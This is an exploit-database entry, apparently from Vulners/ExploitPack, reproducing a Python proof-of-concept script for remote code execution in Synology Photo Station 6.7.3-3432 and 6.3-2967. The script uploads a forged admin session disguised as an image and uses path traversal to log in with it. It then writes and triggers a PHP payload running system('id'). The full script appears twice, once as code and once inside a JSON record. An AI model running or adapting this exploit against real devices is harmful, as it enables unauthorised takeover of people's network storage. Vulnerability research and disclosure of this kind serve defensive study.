Search...

Synology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution

2017-08-08T00:00:00

ID EXPLOITPACK:8C57BF0FAD578B64C92F2B7AA9822BD1
Type exploitpack
Reporter Kacper Szurek
Modified 2017-08-08T00:00:00

Description

Synology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution

                                        
                                            '''
Source: https://blogs.securiteam.com/index.php/archives/3356

Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:

Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:

uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests

# What server you want to attack
synology_ip = 'http://192.168.1.100'

# Your current IP
ip = '192.168.1.200'

# PHP code you want to execute
php_to_execute = '&lt;?php echo system("id"); ?&gt;'

encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'

print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]

r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text

print "[+] Login as fake admin"

# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}

try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)

whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text

print "[+] Upload php file"

c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text


print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))

print f.text

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:50", "references": [], "description": "\nSynology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution", "edition": 1, "reporter": "Kacper Szurek", "exploitpack": {"type": "webapps", "platform": "hardware"}, "published": "2017-08-08T00:00:00", "title": "Synology Photo Station 6.7.3-3432 6.3-2967 - Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:50", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-04-01T19:04:50", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-08-08T00:00:00", "id": "EXPLOITPACK:8C57BF0FAD578B64C92F2B7AA9822BD1", "href": "", "viewCount": 1, "sourceData": "'''\nSource: https://blogs.securiteam.com/index.php/archives/3356\n\nVulnerability details\nThe remote code execution is a combination of 4 different vulnerabilities:\n\nUpload arbitrary files to the specified directories\nLog in with a fake authentication mechanism\nLog in to Photo Station with any identity\nExecute arbitrary code by authenticated user with administrator privileges\nThe chain of vulnerabilities will allow you, in the end, to execute code as:\n\nuid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)\n'''\nimport requests\n\n# What server you want to attack\nsynology_ip = 'http://192.168.1.100'\n\n# Your current IP\nip = '192.168.1.200'\n\n# PHP code you want to execute\nphp_to_execute = '<?php echo system(\"id\"); ?>'\n\nencoded_session = 'root|a:2:{s:19:\"security_identifier\";s:'+str(len(ip))+':\"'+ip+'\";s:15:\"admin_syno_user\";s:7:\"hlinak3\";}'\n\nprint \"[+] Set fake admin sesssion\"\nfile = [('file', ('foo.jpg', encoded_session))]\n\nr = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)\nprint r.text\n\nprint \"[+] Login as fake admin\"\n\n# Depends on version it might be stored in different dirs\npayload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}\n# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}\n\ntry_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)\n\nwhichact = {'action' : 'get_setting'}\nr = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)\nprint r.text\n\nprint \"[+] Upload php file\"\n\nc = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode(\"base64\"), 'type' : 'php'}\nr = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)\nprint r.text\n\n\nprint \"[+] Execute payload\"\nf = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))\n\nprint f.text", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}